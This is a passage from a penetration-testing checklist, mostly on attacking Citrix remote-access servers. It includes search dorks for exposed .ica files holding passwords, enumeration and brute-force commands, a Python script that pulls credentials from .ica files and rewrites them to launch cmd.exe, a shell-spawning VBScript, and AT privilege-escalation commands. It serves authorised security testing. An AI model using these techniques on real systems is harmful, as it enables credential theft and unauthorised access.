16.29.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xwd (output is XWD format regardless of extension; view with xwud -in 192.168.0.1.xwd or convert it)

16.29.2.2. Keystrokes

16.29.2.2.1. Received

16.29.2.2.2. Transmitted

16.29.2.3. Screenshots

16.29.2.4. xhost +

16.29.3. Examine Configuration Files

16.29.3.1. /etc/Xn.hosts

16.29.3.2. /usr/lib/X11/xdm


16.29.3.3. /usr/lib/X11/xdm/xsession

16.29.3.4. /usr/lib/X11/xdm/xsession-remote

16.29.3.5. /usr/lib/X11/xdm/xsession.0

16.29.3.6. /usr/lib/X11/xdm/xdm-config

16.29.3.6.1. DisplayManager*authorize:on

16.30. Tor Port 9001, 9030 open

16.30.1. Tor Node Checker

16.30.1.1. Ip Pages

16.30.1.2. Kewlio.net

16.30.2. nmap NSE script

16.31. Jet Direct 9100 open

16.31.1. Hijetter (Phenoelit)

17. Final Report - template


20. Citrix Specific Testing

20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information, which I have put together, will hopefully help you conduct a vulnerability assessment/penetration test against Citrix.

20.2. Enumeration

20.2.1. web search

20.2.1.1. Google (GHDB)

20.2.1.1.1. ext:ica

20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

20.2.1.1.3. [WFClient] Password= filetype:ica

20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp?ClientDetection=On

20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

20.2.1.1.6. inurl:/Citrix/Nfuse17/

20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

20.2.1.2. Google Hacks (Author Discovered)

20.2.1.2.1. filetype:ica Username=

20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx

20.2.1.2.3. inurl:/Citrix/AccessPlatform/

20.2.1.2.4. inurl:LogonAgent/Login.asp

20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp

20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp

20.2.1.2.7. inurl:/Citrix/NFuse16

20.2.1.2.8. inurl:/Citrix/NFuse151/

20.2.1.2.9. allintitle:MetaFrame XP Login

20.2.1.2.10. allintitle:MetaFrame Presentation Server Login

20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login

20.2.1.3. Yahoo

20.2.1.3.1. originurlextension:ica

20.2.2. site search

20.2.2.1. Manual

20.2.2.1.1. review web page for useful information

20.2.2.1.2. review source for web page

20.2.3. generic

20.2.3.1. nmap -A -Pn -p 80,443,1494 ip_address

20.2.3.2. amap -bqv ip_address port_no.

20.2.4. citrix specific

20.2.4.1. enum.pl

20.2.4.1.1. perl enum.pl ip_address

20.2.4.2. enum.js

20.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address

20.2.4.3. connect.js

20.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application

20.2.4.4. Citrix-pa-scan

20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

20.2.4.5. pabrute.c

20.2.4.5.1. ./pabrute pubapp list app_list ip_address

20.2.5. Default Ports

20.2.5.1. TCP

20.2.5.1.1. Citrix XML Service

20.2.5.1.2. Advanced Management Console

20.2.5.1.3. Citrix SSL Relay

20.2.5.1.4. ICA sessions

20.2.5.1.5. Server to server

20.2.5.1.6. Management Console to server

20.2.5.1.7. Session Reliability (Auto-reconnect)

20.2.5.1.8. License Management Console

20.2.5.1.9. License server

20.2.5.2. UDP

20.2.5.2.1. Clients to ICA browser service

20.2.5.2.2. Server-to-server

20.2.6. nmap nse scripts

20.2.6.1. citrix-enum-apps

20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

20.2.6.2. citrix-enum-apps-xml

20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

20.2.6.3. citrix-enum-servers

20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>

20.2.6.4. citrix-enum-servers-xml

20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

20.2.6.5. citrix-brute-xml

20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

20.3. Scanning

20.3.1. Nessus

20.3.1.1. Plugins

20.3.1.1.1. CGI abuses

20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

20.3.1.1.3. Misc.

20.3.1.1.4. Service Detection

20.3.1.1.5. Web Servers

20.3.1.1.6. Windows

20.3.2. Nikto

20.3.2.1. perl nikto.pl -host ip_address -port port_no.


20.4. Exploitation

20.4.1. Alter default .ica files

20.4.1.1. InitialProgram=cmd.exe

20.4.1.2. InitialProgram=c:\windows\system32\cmd.exe

20.4.1.3. InitialProgram=explorer.exe
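The .ica file the Web Interface hands to the client is a plain INI file: [ApplicationServers] lists the published applications, and each application section carries the server Address, the InitialProgram (a "#name" value means a published application) and sometimes Username/Domain/Password, which is exactly what the "[WFClient] Password= filetype:ica" dork above hunts for. The following is an added example, not a tool from the original checklist, that reads such a file, reports embedded credentials per application, and rewrites InitialProgram to the cmd.exe value listed above. The .ica content, server address, user and password are constructed for the demo; whether the server honours an arbitrary InitialProgram depends on whether the farm restricts launches to published applications.

```python
"""Audit a Citrix .ica file and rewrite InitialProgram (added example, constructed file)."""
from typing import Dict, List

CRLF = "\r\n"
CRED_KEYS = ("Username", "Domain", "Password", "ClearPassword")

# Constructed .ica file in the INI layout Web Interface/NFuse delivers to the client.
SAMPLE_ICA = CRLF.join([
    "[WFClient]",
    "Version=2",
    "ClientName=WI_demo",
    "ProxyType=Auto",
    "",
    "[ApplicationServers]",
    "Notepad=",
    "",
    "[Notepad]",
    "Address=10.0.0.10:1494",
    "InitialProgram=#Notepad",
    "Username=jsmith",
    "Domain=CORP",
    "Password=00b1a2c3d4e5f6a7b8c9",
    "TransportDriver=TCP/IP",
    "WinStationDriver=ICA 3.0",
    "",
])

Sections = Dict[str, Dict[str, str]]


def parse_ica(text: str) -> Sections:
    """Minimal INI reader that keeps key case and order and leaves '#...' values alone."""
    sections: Sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections


def render_ica(sections: Sections) -> str:
    """Write the sections back as key=value lines with CRLF, the way the client expects."""
    out: List[str] = []
    for name, kv in sections.items():
        out.append(f"[{name}]")
        out.extend(f"{k}={v}" for k, v in kv.items())
        out.append("")
    return CRLF.join(out)


def audit_ica(text: str) -> Dict[str, Dict[str, object]]:
    """Per published application: server address, launched program and any embedded credentials."""
    s = parse_ica(text)
    report: Dict[str, Dict[str, object]] = {}
    for app in s.get("ApplicationServers", {}):
        sec = s.get(app, {})
        report[app] = {
            "address": sec.get("Address"),
            "initial_program": sec.get("InitialProgram"),
            "credentials": {k: sec[k] for k in CRED_KEYS if k in sec},
        }
    return report


def set_initial_program(text: str, app: str, program: str = "cmd.exe") -> str:
    """Return the file with the application's InitialProgram replaced by `program`."""
    s = parse_ica(text)
    if app not in s:
        raise KeyError(f"no [{app}] section in .ica file")
    s[app]["InitialProgram"] = program
    return render_ica(s)


if __name__ == "__main__":
    for app, info in audit_ica(SAMPLE_ICA).items():
        print(app, info)
    print(set_initial_program(SAMPLE_ICA, "Notepad", "cmd.exe"))
```

Save the rewritten text as a .ica file and open it with the ICA client; if the launch is refused, fall back to the published-application routes listed under Manual Testing below (batch/VBScript launchers, AT, and hotkeys).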

20.4.2. Enumerate and Connect

20.4.2.1. For applications identified by Citrix-pa-scan

20.4.2.1.1. Pas

20.4.2.2. For published applications with a Citrix client when the master browser is non-public.

20.4.2.2.1. Citrix-pa-proxy

20.4.3. Manual Testing

20.4.3.1. Create Batch File (cmd.bat)


20.4.3.2. Host Scripting File (cmd.vbs)

20.4.3.2.1. Option Explicit

20.4.3.2.2. Dim objShell

20.4.3.2.3. Set objShell = CreateObject("WScript.Shell")

20.4.3.2.4. objShell.Run "%comspec% /k"

20.4.3.2.5. WScript.Quit

20.4.3.2.6. alternative functionality

20.4.3.3. iKat

20.4.3.3.1. Integrated Kiosk Attack Tool

20.4.3.4. AT Command - privilege escalation

20.4.3.4.1. AT HH:MM /interactive "cmd.exe"

20.4.3.4.2. AT HH:MM /interactive %comspec% /k


20.4.3.5. Keyboard Shortcuts/ Hotkeys

20.4.3.5.1. Ctrl + h – View History

20.4.3.5.2. Ctrl + n – New Browser

20.4.3.5.3. Shift + Left Click – New Browser

20.4.3.5.4. Ctrl + o – Internet Address (browse feature)

20.4.3.5.5. Ctrl + p – Print (to file)

20.4.3.5.6. Right Click (Shift + F10)

20.4.3.5.7. F1 – Jump to URL

20.4.3.5.8. SHIFT+F1: Local Task List

20.4.3.5.9. SHIFT+F2: Toggle Title Bar

20.4.3.5.10. SHIFT+F3: Close Remote Application

20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

20.4.3.5.12. CTRL+F2: Remote Task List

20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

20.4.3.5.14. ALT+F2: Cycle through programs

20.4.3.5.15. ALT+PLUS: Alt+TAB

20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

20.5. Brute Force

20.5.1. bforce.js

20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt


20.6. Review Configuration Files

20.6.1. Application server configuration file

20.6.1.1. appsrv.ini

20.6.1.1.1. Location

20.6.1.1.2. World writeable

20.6.1.1.3. Review other files

20.6.1.1.4. Sample file

20.6.2. Program Neighborhood configuration file

20.6.2.1. pn.ini

20.6.2.1.1. Location

20.6.2.1.2. Review other files

20.6.2.1.3. Sample file

20.6.3. Citrix ICA client configuration file

20.6.3.1. wfclient.ini

20.6.3.1.1. Location

20.6.3.1.2. Sample file

20.7. References

20.7.1. Vulnerabilities

20.7.1.1. Art of Hacking

20.7.1.2. Common Vulnerabilities and Exploits (CVE)


20.7.1.2.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

20.7.1.3. OSVDB

20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search

20.7.1.4. Secunia

20.7.1.4.1. http://secunia.com/advisories/search/?search=citrix

20.7.1.5. Security-database.com

20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

20.7.1.6. SecurityFocus

20.7.2. Support

20.7.2.1. Citrix

20.7.2.1.1. Knowledge Base

20.7.2.1.2. Forum

20.7.2.2. Thinworld

20.7.3. Exploits

20.7.3.1. Milw0rm

20.7.3.1.1. http://www.milw0rm.com/search.php

20.7.3.2. Art of Hacking

20.7.3.2.1. Citrix

20.7.4. Tutorials/ Presentations

20.7.4.1. Carnal0wnage

20.7.4.1.1. Carnal0wnage Blog: Citrix Hacking

20.7.4.2. Foundstone

20.7.4.2.1. Got Citrix, Hack IT

20.7.4.3. GNUCitizen

20.7.4.3.1. Hacking CITRIX - the forceful way

20.7.4.3.2. 0day: Hacking secured CITRIX from outside

20.7.4.3.3. CITRIX: Owning the Legitimate Backdoor

20.7.4.3.4. Remote Desktop Command Fixation Attacks

20.7.4.4. Packetstormsecurity

20.7.4.4.1. Hacking Citrix

20.7.4.5. Insomniac Security

20.7.4.5.1. Hacking Citrix

20.7.4.6. Aditya Sood

20.7.4.6.1. Rolling Balls - Can you hack clients

20.7.4.7. BlackHat

20.7.4.7.1. Client Side Security

20.7.5. Tools Resource

20.7.5.1. Zip file containing the majority of the tools mentioned in this article, for easy download/access